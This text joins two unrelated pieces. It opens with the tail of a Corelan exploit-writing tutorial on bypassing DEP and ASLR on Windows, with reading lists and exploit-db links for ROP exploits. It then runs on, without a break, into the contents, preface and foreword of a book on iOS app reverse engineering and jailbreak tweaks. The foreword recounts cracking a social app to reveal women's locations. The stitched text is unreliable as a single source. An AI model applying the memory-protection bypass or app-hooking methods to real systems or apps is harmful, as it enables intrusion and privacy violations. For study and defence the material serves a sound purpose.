subtract 0x4B326 bytes from the value picked up from the stack (basically apply the staticoffset...) and you'll have a dynamic way to obtain the function pointer to VirtualProtect(), onVista SP2, despite the fact that kernel32 is ASLR aware.Note : finding return pointers on the stack is not that uncommon, so this may be agood approach to bypassing ASLR for kernel32 pointers.and that... would be a good exercise for you.Good luck !  Other literature on DEP / Memory protection bypassYou can't stop us - CONFidence 2010 (Alexey Sintsov)Buffer overflow attacks bypassing DEP Part 1 (Marco Mastropaolo)Buffer overflow attacks bypassing DEP Part 2 (Marco Mastropaolo)Practical Rop (Dino Dai Zovi)Bypassing Browser Memory Protections (Alexander Sotirov & Mark Down)Return-Oriented Programming (Hovav Shacham, Erik Buchanan, Ryan Roemer, Stefan Savage)Exploitation with WriteProcessMemory (Spencer Pratt)Exploitation techniques and mitigations on Windows (skape)Bypassing hardware enforced DEP (skape and skywing)A little return oriented exploitation on Windows x86 - Part 1 (Harmony Security - StephenFewer)A little return oriented exploitation on Windows x86 - Part 2 (Harmony Security - StephenFewer)(un)Smashing the Stack (Shawn Moyer) (Paper)http://www.usenix.org/events/sec09/tech/slides/sotirov.pdfBypassing DEP case study (Audio Converter) (sud0)Some good example ROP exploits can be found here :ProSSHD 1.2 remote post-auth exploit (http://www.exploit-db.com/exploits/12495)PHP 6.0 Dev str_transliterate() (http://www.exploit-db.com/exploits/12189)VUPlayer m3u buffer overflow (http://www.exploit-db.com/exploits/13756)Sygate Personal Firewall 5.6 build 2808 ActiveX with DEP bypass (http://www.exploit-db.com/exploits/13834)Castripper 2.50.70 (.pls) stack buffer overflow with DEP bypass (http://www.exploit-db.com/exploits/13768) Questions ?If you've got questions, don't hesitate to post them in our forums :http://www.corelan.be:8800/index.php/forum/exploit-writing-win32-bypass-stack-memory-protections/  Thanks to
My wife (for her everlasting love and support), my friends all over the world, and of course theCorelan Team members.  I really couldn't have made this tutorial without you guys. Learning,sharing and teamwork pays off !I also would like to thank Shahin Ramezany for reviewing this document, and finally Dino Dai Zovifor his inspiring work, the permission to use some of his diagrams in this article, and for reviewingthis tutorial.© 2010, Peter Van Eeckhoutte. All rights reserved. Terms of Use are applicable to all contenton this blog. If you want to use/reuse parts of the content on this blog, you must provide a link tothe original content on this blog.
 Posted in 001_Security, Exploit Writing Tutorials, Exploits | 
 Tags: 41414141, accessviolation, add esp, alwaysoff, alwayson, aslr, awe, breakpoint, bypass, C0000005, call, dep, deppolicy, egg, egg hunter, exploit, exploit writing, gadget, heapcreate, immunity debugger, memcpy,ntsetinformationprocess, nx, offset, optin, optout, pae, permanent dep, pvefindaddr, register,return oriented programming, rop, rop gadget, setprocessdeppolicy, stack, stack pivot, virtualalloc,virtualprotect, WinExec, writeprocessmemory, xdRelated Posts:Exploit writing tutorial part 6 : Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLRExploit writing tutorial part 9 : Introduction to Win32 shellcodingExploit writing tutorial part 8 : Win32 Egg HuntingExploit writing tutorial part 1 : Stack Based OverflowsExploit writing tutorial part 3 : SEH Based ExploitsExploit writing tutorial part 2 : Stack Based Overflows – jumping to shellcodeKen Ward Zipper exploit write-up on abysssec.comExploit writing tutorial part 7 : Unicode – from 0×00410041 to calcExploit writing tutorial part 4 : From Exploit to Metasploit – The basicsExploit writing tutorial part 3b : SEH Based Exploits – just another exampleLeave a commentYou must be logged in to post a comment.Meet me at Brucon 2010
Peter says:
There is no way I can keep this site up and running without your help. »     ...     « If you have enjoyed a certain post or like one of my tools, don't forget to vote/rate it !»     ...     « If you have questions about certain posts, content or tools published on this website,then please use the forums to post questions. Don't write your questions in the Comments section.»     ...     « If you want to be the first to know about new posts/tools/tutorials on this blog, thensubscribe to the mailinglist. Use the 'Subscribe to updates via email' link below (in the Stay postedsection)»Your profileChange your profile/passwordActionsRegisterLog inEntries RSSComments RSSWordPress.orgStay postedSubscribe to posts via emailFollow me on twitterSearch this blog
Search
 Corelan Security Advisorieschap0 on CORELAN-10-051 - Vocoo CP3 Studio PC Version 2.0 Dos June 12, 2010Lincoln on CORELAN-10-050 – Sygate Personal Firewall 5.6 build 2808 ActiveX June 11, 2010Sud0 on CORELAN-10-049 - Power Tab Editor v1.7 (Build 80) Buffer Overflow June 11, 2010chap0 on CORELAN-10-048 - D.R. Software Multiple Products June 7, 2010chap0 on CORELAN-10-047 - Sure Thing CD/DVD Labeler Software June 7, 2010sinn3r on CORELAN-10-046 – Xftp v3.0 Build 0239 Long Filename Buffer Overflow May 31,2010TecR0c on CORELAN-10-045 – ZipExplorer 7.0 (.zar) DoS May 31, 2010sinn3r on CORELAN-10-044 - IP2location.dll v1.0.0.1 Function Initialize() Buffer OverflowMay 30, 2010MaRkO T. on CORELAN-10-043-- Easy Address book Webserver 1.2 CSRF May 24, 2010Lincoln on CORELAN-10-042 – (ANSMTP.DLL/AOSMTP.dl) SMTP Component ActiveX ver8.0.0.2 May 19, 2010Categories
Select CategoryTerms of Use | Copyright © 2009 Peter Van Eeckhoutte ́s Blog. All Rights Reserved.Your IP address : 68.9.231.138 | 69 queries. 5.490 seconds | www.corelan.be - artemis.corelan.be | Uptime Report  
  
 
snakeninny, hangcom  
Translated by Ziqi Wu, 0xBBC, tianqing and Fei Cheng 
 
 
iOS App Reverse Engineering  
 
 
Table of Contents 
 
Recommendation   ................................ ................................ ................................ ................................ .....................   1  
Preface   ................................ ................................ ................................ ................................ ................................ .......   2  
Foreword   ................................ ................................ ................................ ................................ ................................ ...  7  
Part 1 Concepts   ................................ ................................ ................................ ................................ .......................   12  
Chapter 1 Introduction to iOS reverse engineering   ................................ ................................ .............................   13  
1.1   Prerequisite s  of  iOS  reverse  engineering   ................................ ................................ ................................ ..........   13  
1.2   What  does  iOS  reverse  engineering  do   ................................ ................................ ................................ ............   13  
1.2.1   Security  related  iOS  reverse  engineering   ................................ ................................ ................................ ......  16  
1.2.2   Development  related  iOS  reverse  engineering   ................................ ................................ .............................   17  
1.3   The  process  of  iOS  reverse  engineering   ................................ ................................ ................................ ............   19  
1.3.1   System  Analysis   ................................ ................................ ................................ ................................ ............   19  
1.3.2   Code  Analysis   ................................ ................................ ................................ ................................ ................   20  
1.4   Tools  for  iOS  reverse  engineering   ................................ ................................ ................................ .....................   20  
1.4.1   Monitors   ................................ ................................ ................................ ................................ .......................   21  
1.4.2   Disassem blers   ................................ ................................ ................................ ................................ ...............   21  
1.4.3   Debuggers   ................................ ................................ ................................ ................................ ....................   23  
1.4.4   Development  kit   ................................ ................................ ................................ ................................ ...........   23  
1.5   Conclusion   ................................ ................................ ................................ ................................ ........................   23  
Chapter 2 Introduction to jailbroken iOS   ................................ ................................ ................................ ..............   24  
2.1   iOS  System  Hierarchy   ................................ ................................ ................................ ................................ ........   24  
2.1.1   iOS  filesystem   ................................ ................................ ................................ ................................ ...............   26  
2.1.2   iOS  file  permission   ................................ ................................ ................................ ................................ ........   32  
2.2   iOS  file  types   ................................ ................................ ................................ ................................ .....................   33  
2.2.1   Application   ................................ ................................ ................................ ................................ ....................   33  
2.2.2   Dynamic  Library   ................................ ................................ ................................ ................................ ............   37  
2.2.3   Daemon   ................................ ................................ ................................ ................................ ........................   38  
2.3   Conclusion   ................................ ................................ ................................ ................................ ........................   39  
Part 2 Tools   ................................ ................................ ................................ ................................ ..............................   40  
Chapter 3 OSX toolkit   ................................ ................................ ................................ ................................ ............   41  
3.1   class-­‐ dump   ................................ ................................ ................................ ................................ ........................   41  
3.2   Theos   ................................ ................................ ................................ ................................ ................................   43  
3.2.1   Introduction  to  Theos   ................................ ................................ ................................ ................................ ...  43  
3.2.2   Install  and  configure  Theos   ................................ ................................ ................................ ...........................   44  
3.2.3   Use  Theos   ................................ ................................ ................................ ................................ .....................   46  
3.2.4   An  example  tweak   ................................ ................................ ................................ ................................ ........   67  
3.3   Reveal   ................................ ................................ ................................ ................................ ...............................   70  
3.4   IDA  ................................ ................................ ................................ ................................ ................................ ....  76  
 
 
 3.4.1   Introduction  to  IDA   ................................ ................................ ................................ ................................ .......   76  
3.4.2   Use  IDA   ................................ ................................ ................................ ................................ .........................   77  
3.4.3   An  analy sis  example  of  IDA   ................................ ................................ ................................ ..........................   90  
3.5   iFunBox   ................................ ................................ ................................ ................................ .............................   95  
3.6   dyld_decache   ................................ ................................ ................................ ................................ ....................   96  
3.7   Conclusi on  ................................ ................................ ................................ ................................ ........................   97  
Chapter 4 iOS toolkit   ................................ ................................ ................................ ................................ ..............   98  
4.1   CydiaSubstrate   ................................ ................................ ................................ ................................ ..................   98  
4.1.1   MobileHooker   ................................ ................................ ................................ ................................ ...............   98  
4.1.2   MobileLoader   ................................ ................................ ................................ ................................ ..............   109  
4.1.3   Safe  mode   ................................ ................................ ................................ ................................ ...................   109  
4.2   Cycript   ................................ ................................ ................................ ................................ .............................   111  
4.3   LLDB  and  debugserver   ................................ ................................ ................................ ................................ ....  115  
4.3.1  Introduction  to  LLDB   ................................ ................................ ................................ ................................ ...  115  
4.3.2   Introduction  to  debugserver   ................................ ................................ ................................ .......................   116  
4.3.3   Configure  debugserver   ................................ ................................ ................................ ...............................   116  
4.3.4   Process  launching  and  attaching  using  debugserver   ................................ ................................ ..................   118  
4.3.5   Use  LLDB   ................................ ................................ ................................ ................................ .....................   119  
4.3.6   Miscel laneous  LLDB   ................................ ................................ ................................ ................................ ....  133  
4.4   dumpdecrypted   ................................ ................................ ................................ ................................ ..............   134  
4.5   OpenSSH   ................................ ................................ ................................ ................................ .........................   137  
4.6   usbmuxd   ................................ ................................ ................................ ................................ .........................   138  
4.7   iFile  ................................ ................................ ................................ ................................ ................................ ..  140  
4.8   MTerminal   ................................ ................................ ................................ ................................ ......................   141  
4.9   syslogd  to   /var/log/syslog   ................................ ................................ ................................ ...............................   142  
4.10  Conclusion   ................................ ................................ ................................ ................................ ......................   142  
Part 3 Theories   ................................ ................................ ................................ ................................ ......................   143  
Chapter 5 Objective -C related iOS reverse engineering   ................................ ................................ ..................   144  
5.1   How  does  a  tweak  work  in  Objective -­‐C  ................................ ................................ ................................ ..........   144  
5.2   Methodology  of  writing  a  tweak   ................................ ................................ ................................ ....................   147  
5.2.1   Look  for  inspiration   ................................ ................................ ................................ ................................ .....  147  
5.2.2   Locate  target  files   ................................ ................................ ................................ ................................ .......   150  
5.2.3  Locate  target  functions   ................................ ................................ ................................ ...............................   156  
5.2.4   Test  private  methods   ................................ ................................ ................................ ................................ ..  158  
5.2.5   Analyze  method  arguments   ................................ ................................ ................................ ........................   160  
5.2.6   Limitations  of  class-­‐ dump   ................................ ................................ ................................ ...........................   162  
5.3   An  example  tweak  using  the  methodology   ................................ ................................ ................................ ....  163  
5.3.1   Get  inspiration   ................................ ................................ ................................ ................................ ............   164  
5.3.2   Locate  files   ................................ ................................ ................................ ................................ ..................   165  
5.3.3   Locate  methods  and  functions   ................................ ................................ ................................ ....................   172  
5.3.4   Test  methods  and  functions   ................................ ................................ ................................ .......................   174  
5.3.5   Write  tweak   ................................ ................................ ................................ ................................ ................   175  
5.4   Conclusion   ................................ ................................ ................................ ................................ ......................   176  
Chapter 6 ARM related iOS reverse engineering   ................................ ................................ ...............................   178  
6.1   Introduction  to  ARM  assembly   ................................ ................................ ................................ .......................   178  
6.1.1   Basic  concepts   ................................ ................................ ................................ ................................ ............   179  
6.1.2   Interpretation  of  ARM/THUMB  instructions   ................................ ................................ ...............................   184  
6.1.3   ARM  calling  conventions   ................................ ................................ ................................ ............................   191  
6.2   Advanced  methodology  of  writing  a  tweak   ................................ ................................ ................................ ....  193  
 
 
 6.2.1   Cut  into  the  target  App  and  find  the  UI  function   ................................ ................................ ........................   195  
6.2.2   Locate  the  target  function  from  the  UI  function   ................................ ................................ .........................   207  
6.3   Advanced  LLDB  usage   ................................ ................................ ................................ ................................ .....  241  
6.3.1   Look  for  a  function ’s  caller   ................................ ................................ ................................ .........................   241  
6.3.2   Change  process  execution  flow   ................................ ................................ ................................ ..................   247  
6.4   Conclusion   ................................ ................................ ................................ ................................ ......................   249  
Part 4 Practices   ................................ ................................ ................................ ................................ .....................   250  
 Chapter 7 Practice 1: Characount for Notes 8   ................................ ................................ ................................ ...  251  
7.1   Notes   ................................ ................................ ................................ ................................ ...............................   251  
7.2   Tweak  prototyping   ................................ ................................ ................................ ................................ ..........   252  
7.2.1   Locate  Notes ’  executable   ................................ ................................ ................................ ............................   255  
7.2.2   class -­‐dump  MobileNotes ’  headers   ................................ ................................ ................................ ..............   256  
7.2.3   Find  the  controller  of  note  browsing  view  using  Cycript   ................................ ................................ .............   257  
7.2.4   Get  the  current  note  object  from   NoteDisplayController   ................................ ................................ ...........   258  
7.2.5   Find  a  method  to  monitor  note  text  changes  in  real  time   ................................ ................................ ..........   261  
7.3   Result  interpretation   ................................ ................................ ................................ ................................ ......  265  
7.4   Tweak  writing   ................................ ................................ ................................ ................................ .................   266  
7.4.1   Create  tweak  project  "CharacountforNotes8"  using  Theos   ................................ ................................ ........   266  
7.4.2   Compose  CharacountForNotes8.h   ................................ ................................ ................................ ..............   266  
7.4.3     Edit  Tweak.xm   ................................ ................................ ................................ ................................ ................   267  
7.4.4     Edit  Makefile  and  control  files   ................................ ................................ ................................ ......................   267  
7.4.5    Test   ................................ ................................ ................................ ................................ ................................   268  
7.5   Conclusion   ................................ ................................ ................................ ................................ ......................   272  
Chapter 8 Practice 2: Mark user specific emails as read automatically   ................................ ...........................   273  
8.1   Mail  ................................ ................................ ................................ ................................ ................................ .  273  
8.2   Tweak  prototyping   ................................ ................................ ................................ ................................ ..........   274  
8.2.1    Locate  and  class -­‐dump  Mail ’s  executable   ................................ ................................ ................................ .....  278  
8.2.2    Import  headers  into  Xcode   ................................ ................................ ................................ .............................   279  
8.2.3    Find  the  controller  of   “Mailboxes ”  view  using  Cycript   ................................ ................................ ...................   280  
8.2.4    Find  the  delegate  of   “All  Inboxes ”  view  using  Reveal  and  Cycript   ................................ ................................ .  282  
8.2.5    Locate  the  refresh  completion  callback  method  in  MailboxContentViewController   ................................ ......  284  
8.2.6    Get  all  emails  from  MessageMegaMall   ................................ ................................ ................................ .........   288  
8.2.7    Get  sender  address  from  MFLibraryMessage  and  mark  email  as  read  using  MessageMegaMall   ................   290  
8.3   Result  interpretation   ................................ ................................ ................................ ................................ ......  295  
8.4   Tweak  writing   ................................ ................................ ................................ ................................ .................   296  
8.4.1    Create  tweak  project   “iOSREMailMarker ”  using  Theos   ................................ ................................ .................   296  
8.4.2    Compose  iOSREMailMarker.h   ................................ ................................ ................................ ........................   297  
8.4.3    Edit  Tweak.xm   ................................ ................................ ................................ ................................ ................   297  
8.4.4    Edit  Makefile  and  control  files   ................................ ................................ ................................ .......................   298  
8.4.5    Test   ................................ ................................ ................................ ................................ ................................   299  
8.5   Conclusion   ................................ ................................ ................................ ................................ ......................   301  
Chapter 9 Practice 3: Save and share Sight in WeChat   ................................ ................................ ....................   302  
9.1   WeChat   ................................ ................................ ................................ ................................ ...........................   302  
9.2   Tweak  prototyping   ................................ ................................ ................................ ................................ ..........   304  
9.2.1     Observe  Sight  view  and  look  for  cut -­‐in  points   ................................ ................................ ................................   304  
9.2.2    Get  WeChat  headers  using  class -­‐dump   ................................ ................................ ................................ .........   305  
9.2.3    Import  WeChat  headers  into  Xcode   ................................ ................................ ................................ ...............   306  
9.2.4    Locate  the  Sight  view  using  Reveal   ................................ ................................ ................................ ................   307  
9.2.5    Find  the  long  press  action  selector   ................................ ................................ ................................ ................   308  
 
 
 9.2.6    Find  the  controller  of  Sight  view  using  Cycript   ................................ ................................ ...............................   314  
9.2.7    Find  the  Sight  object  in  WCTimeLineViewController   ................................ ................................ ......................   316  
9.2.8    Get  a  WCDataItem  object  from  WCCo ntentItemViewTemplateNewSight   ................................ ....................   321  
9.2.9    Get  target  information  from  WCDataItem   ................................ ................................ ................................ ....  324  
9.3   Result  interpretation   ................................ ................................ ................................ ................................ ......  333  
9.4   Tweak  writing   ................................ ................................ ................................ ................................ .................   333  
9.4.1    Create  tweak  project   “  iOSREWCVideoDownloader ”  using  Theos   ................................ ................................ .  333  
9.4.2  Compose  iOSREWCVideoDownloader.h   ................................ ................................ ................................ ..........   334  
9.4.3    Edit  Tweak.xm   ................................ ................................ ................................ ................................ ................   335  
9.4.4    Edit  Makefile  and  control  files   ................................ ................................ ................................ .......................   336  
9.4.5    Test   ................................ ................................ ................................ ................................ ................................   337  
9.5   Easter  eggs   ................................ ................................ ................................ ................................ ......................   339  
9.5.1    Find   the  Sight  in  UIMenuItem   ................................ ................................ ................................ ........................   339  
9.5.2    Historical  transition  of  WeChat ’s  headers  count   ................................ ................................ ...........................   340  
9.6   Conclusion   ................................ ................................ ................................ ................................ ......................   343  
Chapter 10 Practice 4: Detect And Send iMessages   ................................ ................................ ..........................   345  
10.1  iMessage   ................................ ................................ ................................ ................................ .........................   345  
10.2  Detect  if   a  number  or  email  address  supports  iMessage   ................................ ................................ ...............   345  
10.2.1    Observe  MobileSMS  and  look  for  cut -­‐in  points   ................................ ................................ ............................   345  
10.2.2    Find  placeholder  using  Cycript   ................................ ................................ ................................ .....................   348  
10.2.3    Find  the  1st  data  source  of  placeholderText  using  IDA  and  LLDB   ................................ ................................   356  
10.2.4     Find  the  Nth  data  source  of  placeholderText  using  IDA  and  LLDB   ................................ ...............................   359  
10.2.5     Restore  the  process  of  the  original  data  source  becoming  placeholderText   ................................ ...............   390  
10.3  Send  iMessages   ................................ ................................ ................................ ................................ ...............   391  
10.3.1    Observe  MobileSMS  and  look  for  cut -­‐in  points   ................................ ................................ ............................   391  
10.3.2    Find  response  method  of   “Send ”  button  using  Cycript   ................................ ................................ ................   393  
10.3.3    Find  suspicious  sending  ac tion  in  response  method   ................................ ................................ ....................   394  
10.4  Result  Interpretation   ................................ ................................ ................................ ................................ ......  422  
10.5  Tweak  writing   ................................ ................................ ................................ ................................ .................   424  
10.5.1     Create  tweak  project   “iOSREMadridMessenger ”  using  Theos   ................................ ................................ .....  424  
10.5.2    Compose  iOSREMadridMessenger.h   ................................ ................................ ................................ ............   425  
10.5.3    Edit  Tweak.xm   ................................ ................................ ................................ ................................ ..............   425  
10.5.4     Edit  Makefile  and  control  files   ................................ ................................ ................................ .....................   426  
10.5.5     Test  with  Cycript   ................................ ................................ ................................ ................................ ..........   427  
10.6  Conclusion   ................................ ................................ ................................ ................................ ......................   427  
Jailbreaking for Developers, An Overview   ................................ ................................ ................................ .........   429  
Evading the Sandbox   ................................ ................................ ................................ ................................ ...........   432  
Tweaking is the new -age hacking   ................................ ................................ ................................ .......................   434	  
  
 
1  
Recommendation 
 
 
In our lives, we pay very little attention to things that work. Everything we interact with 
hides a fractal of complexity —hundreds of smaller components, all of which serve a vital role, 
each disappearing into its destined form and function. Every day, millions of people take to the 
streets with phones in their hands, and every day hardware, firmware, and  software blend into 
one contiguous mass  of games, photographs, phone calls, and text messages.  
It holds, then, that each component retains leverage over the 
others. Hardware  owns  firmware,  firmware loads and  reins  in software, and software 
in turn direct s hardware. If you could  take control of  one of them,  could  you influence 
a device to enact your  own  desires?  
iOS App Reverse Engineering  provides a unique view inside the software running on iOSTM, 
the operating system that powers the Apple iPhone® and iPa d®. Within, you will learn what 
makes up application code and how each component fits into the software ecosystem at large. 
You will explore the hidden second life your phone leads, wherein it is a full -fledged computer 
and software development platform an d there is no practical limit to its functionality.  
So, young developer, break free of restricted software and find out exactly  what makes your 
phone tick! 
Dustin L. Howett  
iPhone Tweak Developer  
 
     
2  
Preface 
 
 
I’m a man who loves traveling by myself. On every vacation in university, I spen t about 7 to 
10 days as a backpacker, traveling around China. Since it  was self-guiding tour s, no guide would  
come to help me arrange anything. As a result, before traveling, my friends and I had to prepare 
everything by ourselves, such as scheduling, confirming the routes and buying tickets. We also 
need ed to put deep thought into our plans, and thought  about th eir dangers.  
It’s a commonly held belief that traveling, especially backpacking, is a great way to expand 
one’ s horizons. What I see during my trips can make me more knowledgeable about the world 
around me. More importantly, before start traveling, I need to get everything prepared for this 
journey. My mind has arrived at the destination, even if my body is still at the starting point. 
This way of thinking is good for cultivating a holistic outlook as well as making us think about 
problems from a wider, longer term perspective.  
Before pursuing my master degree in 2009, I thought deeply about what I wanted to study. 
My major was computer science. From the beginning of undergraduate year, most of my 
classmates engaged in the study of Windows. As a student who  wasn ’t good at programming  
then , there were two alternatives for me to choose —one was to continue the study of 
Windows, and the other was to explore something else. If I chose the former, there were at least 
two benefits for me. Firstly, there were lots of documents for reference. The second one was 
that there were numerous people engaging in the study of Windows. When I met problems, I 
could consult and discuss with them. However, from the other side, there were also some 
disadvantages. More references possibly led to less creativity, and the more people engaged in 
studying Windows,  the more competition I would face. 
In a nutshell, if I engaged in Windows related work, I could start my career very easily. 
However, there was no guarantee that I could be outstanding among the researchers. If I chose 
to do something else, it might be ve ry difficult  at the beginning . But as long as I persist with my 
goal, I could make something different.  
 
3 Fortunately, my mentor had the same idea. He recommended me to work on mobile 
development. At that time, there were very few people engaging in this area in China and I had 
no idea about smart phones. My mobile phone was an out of date Philips phone, so th at it was 
very hard for me to start to develop applications. Despite the difficulties, I trusted my mentor 
and myself. Not only because I had only chosen him after careful research and 
recommendations by my senior fellow students, but also that we shared t he same opinions. So I 
started to search online for mobile development related information. After learning only a few 
concepts about smart phones and mobile Internet, I faintly found that this industry was 
conductive to the theory that computers and Intern et would become smaller, faster and more 
tightly related with our lives. Many things could be done in this area. So I chose to study iOS.  
Everything was hard in the beginning. There were lots of differences between iOS and 
Windows. For example, iOS was an UNIX- like operating system, which was a complete, but 
closed, ecosystem. Its main programming language Objective -C, and jailbreak, were all strange 
fields lacking of information at that point. So I learned by myself, week by week, in a 
hackintosh. And this lasted for almost a year. During this period of time, I read the book “Learn 
Objective -C on the Mac ”, input the code on the book into Xcode and checked the result by 
running the simulator. However, the code and the UI were hard to be associated with each 
other. Besides, I searched those half -UNIX concepts like backgrounding on Google and tried to 
understand them, but they were really hard to understand. When my classmates published their papers, I even wondered what I was doing during these several months.  When they went out 
and party all night, I decided to code alone in the dormitory. When they had fallen asleep, I had 
to keep on working in the lab. Although these things made me feel lonely, they benefitted me a 
lot. I learnt a lot and became more informa tive during this period. As well, it made me become 
confident. The more knowledge I got, the less lonely I felt. A man can be excellent when he can bear the loneliness. What you pay will finally return and enrich yourself. After one -year of 
practice, in March 2011, the obscure code suddenly became understandable. The meaning of every word and the relationship of every sentence became clearer. All fragmented knowledge 
appeared to be organized in my head and the logic of the whole system became explicit.  
So I sped up my research. In April 2011, I finished the prototype of my master thesis and got 
high praise from my mentor who didn ’t keep high expectation on my iOS research. Since then, I 
changed from a person who felt good to a man who was really good, which  signified my pass of 
entry level of iOS research.  
 
4 In the past few years, I made friends with the author of Theos, DHowett, consulted 
questions with the father of Activator, rpetrich and quarreled with the admin of TheBigBoss 
repo, Optimo. They were the pe ople who solved most of my problems along the way. During 
the development of SMSNinja, I met Hangcom,  the second author of this book . As research 
continues, I met a group of people who was doing excellent things but keeping low profile and 
finally I realiz ed I’ m not alone— We stand alone together.  
Taking a look back at the past five years, I’ m glad that I made the right choice. It ’s hard to 
imagine that you can publish a book related to Windows with only 5 -years of research. 
However, this dream comes true with iOS. The fierce competition among Apple, Microsoft and Google and the feedback from market both prove that this industry will definitely play a leading 
role in the next 10 years. I feel very lucky that I can be a witness and participa nt. So, iOS fans,  
don’ t hesitate, come and join us, right now!  
When received the invitation from Hang com  to write this book, I was a bit hesitant. Due to 
the large population  of China, there were fierce competitions in all walks of life. I summarized 
all accumulated knowle dge from countless failures and if I shared all of them in details, would it 
result in more competitors? Would my advantages be handed over to others? But throughout the history of jailbreak, from Cydia and CydiaSubstrate to Theos, all these pieces of soft ware 
were open source and impressed me a lot. It was because these excellent engineers shared their “advantages”  that we could absorb knowledge from and then gradually grew better. 
‘TweakWeek ’ led by rpetrich and ‘OpenJailbreak ’ led by posixninja also shar ed their valuable 
core source code so that more fans could participate in building up the ecosystem of jailbro ken 
iOS. They were the top developers in this area and their advantages didn ’t get reduced by 
sharing. I was a learner who benefitted a lot from t his sharing chain. Moreover, I intended to 
continue my research. If I didn ’t stop, my advantage would stay and the only competitor was 
myself. I believed sharing would help a lot of developers who were stuck at the entry level 
where I used to be. And shari ng could also combine all wisdom together to make science and 
technology serve people better. Meanwhile, I could make more friends. From this point of view, writing this book can be regarded as a long term thought, just like what I did as a backpacker.  
Ok, What I said above is too serious for the preface. Let me say something about this book. 
The content of the book is suitable for the majority of iOS developers who are not satisfied with 
developing Apps. To be honest, t his book is techinically better than my master thesis. And if you 
 
5 want to follow up, please focus on our official website http://bbs.iosre.com and our IRC 
channel #Theos on irc.saurik.com. Together, let us build the jailbreak community!  
Here, I want to say thank you to my mother. Without her support, I cannot focus on my 
research and study. Thanks to my grandpa for the enlightenment of my English studying, 
having good command of the English language is essential for communicating internationally. 
Thanks to my mentor for his guidance that helpe d me grew fast during the three- year master 
career. Thanks to DHowett, rpetrich, Optimo and those who gave me much help as well as sharp criticism. They helped me grew fast and made me realized that I still had a lot to do. 
Thanks  to britta, Codyd51, DHowe tt, Haifisch , Tyilo, uroboro and yrp for suggestions and 
review. Also, I would like to say thank you to my future girlfriend. It is the absence of you that 
makes me focus on my research. So, I will share half of this book ’s royalty with you :)  
Career, fami ly, friendship, love are life -long pursuits  of ordinary people. However, most of 
us would fail to catch them all, we have to partly give up . If that offends  someone, I would like 
to sincerely apologize for my behaviors and thank you for your forgiveness.  
At last, I want to share a poem that I like very much. Despite regrets, life is amazing.  
 
The Road Not Taken  
Robert Frost, 1874 – 1963 
 
Two roads diverged in a yellow wood,  
And sorry I could not travel both  
And be one traveler, long I stood  
And looked down  one as far as I could  
To where it bent in the undergrowth;  
 
Then took the other, as just as fair,  
And having perhaps the better claim,  
Because it was grassy and wanted wear;  
Though as for that the passing there  
Had worn them really about the same,  
 
And both that morning equally lay  
In leaves no step had trodden black.  
Oh, I kept the first for another day!  
Yet knowing how way leads on to way,  
I doubted if I should ever come back.  
 
I shall be telling this with a sigh  
Somewhere ages and ages hence:  
Two road s diverged in a wood, and I -- 
I took the one less traveled by,  
 
6 And that has made all the difference.  
 
In memory of my Grandpa H anmin Liu and Grandma Chaoyu Wu  
snakeinny  
  
  
Foreword 
 
 
Why did I write this book?  
Two years ago, I changed my job from network administrator to mobile development. It 
was the time that mobile development was booming in China. Many startups had sprung up 
and social networking Apps were very popular among  investors. As long as you had a g ood idea, 
you could get venture capital at scale of millions, and high salary recruitment dazzles everyone.  
At that time, I had already developed some difficult enterprise Apps and I wanted to try 
some cooler techniques rather than developing social Apps , which were too easy for me. By 
chance, I joined the company Security Manager, built the iOS team from scratch, and took the 
responsi bility for developing iOS Apps  for both App Store and Cydia.  
In fact, the foundation of jailbreak development is iOS reverse  engineering. However, I 
didn’ t have too much experience at that time. I was totally a newbie in this area. Fortunately, I 
could search and learn knowledge on Google. And for iOS developers, jailbreak development 
and reverse engineering were not completely  separate d. Although the information shared on 
the Internet was fragmented and sometimes duplicated, they could still be organized into a complete knowledge map as long as you paid much attention.  
However, studying alone makes people feel lonely, especiall y when you encounter a 
problem that no one else has encountered. Every time I had to solve problems by myself, I felt 
that it would be very happy if there were some skillful people that I could communicate with. 
Although I could email my questions to those  experts like Ryan Petrich, I thought it might be 
some disturbance for them if my questions were too easy for them . So I always tried to dig into 
the problems and solve it by  myself before I decided to open my mouth . 
This embarrassing period lasted for over half a year and it ended when I met another author 
of this book, snakeninny, in 2012. At that time, he was a master student who faced the pressure 
of graduation. However, he didn ’t write his master thesis. Instead, he focused on the underlying 
 
8 iOS research and made big progress. I once asked him why not choose to develop iOS Apps 
since there were already lots of people engaging in it and had made large amount of money. He 
said that compared with making money, he ’d rather be a  top developer in the world.  Oh boy, 
how ambitious!  
Most of time we solved problems independently. Although we just occasionally discussed 
with each other on the Internet, we still made some valuable collaborations. Before we started 
to write this book, we once cracked MOMO (a socia l App targeting Chinese) by reverse 
engineering and made a tweak that could show position of girls on the map. Of course, we were harmless developers and we submitted this bug to MOMO and they soon fixed it. This time, we 
cooperate again, summarize our kno wledge into this book and present it to you.  
During these years of research on jailbreak development and reverse engineering, the 
biggest payoff for me is that when I look at an iOS App, I always try to analyze it from 
underlying architecture and its perfo rmance. Both can directly reflect the skill level of its 
development team. Not only can reverse engineering experiences be applied to jailbreak 
development, but also they are suitable for App development. Of course, we must admit there 
are both positive an d negative impacts on reverse engineering. However, we cannot deny the 
necessity of this area even if Apple doesn ’t advocate jailbreak development. If we blindly believe 
that the security issues exposed in this book don ’t actually exist, we ’re just lying to  ourselves. 
Every experienced developer understands that the more knowledge you know, the more 
likely you have to deal with underlying technologies. For example, what does sandbox do? Is it a 
pity that we only study the mechanism of runtime theoretically?  
In the field of Android development, the underlying technologies are open source. 
However, for iOS, only the tip of the iceberg has been exposed. Although there are some iOS 
security related books such as 
Hacking and Securing iOS Applications  and iOS Hacker’ s 
Handbook , they are too hard for most App developers to understand. Even those who already 
have some experience  in reverse engineering,  like us, have difficulties reading these books.  
Since those books are too hard for most people, why not write a book consists of more 
junior stage details and examples? So concepts, tools, theories and practices make up the 
contents of this book in a serialized and methodological way . We illustrate our experience a nd 
knowledge from easy to hard accompanying with lots of examples, helping readers explore the 
internals of Apps step by step. We do not try to analyze only a piece of code snippets in depth 
like some tech blogs. Also, we don ’t want to puzzle you with how many similar solutions can 
 
9 we use to fix the same problem. What we want to do is to provide readers with a complete 
system of knowledge and a methodology of iOS reverse engineering. We believe that readers 
will gain a lot from this book.  
Recently, more and more programming experts are joining the jailbreak development 
community. Although they keep low profile, their works, such as jailbreak tools, App assistants 
and Cydia tweaks, have great influence on iOS. Their technique level is far beyond mine. But 
I’m more eager to share knowledge in the hope of helping others.   
Who are our target readers?  
People of the following kinds may find this book useful.  
•  iOS enthusiasts. 
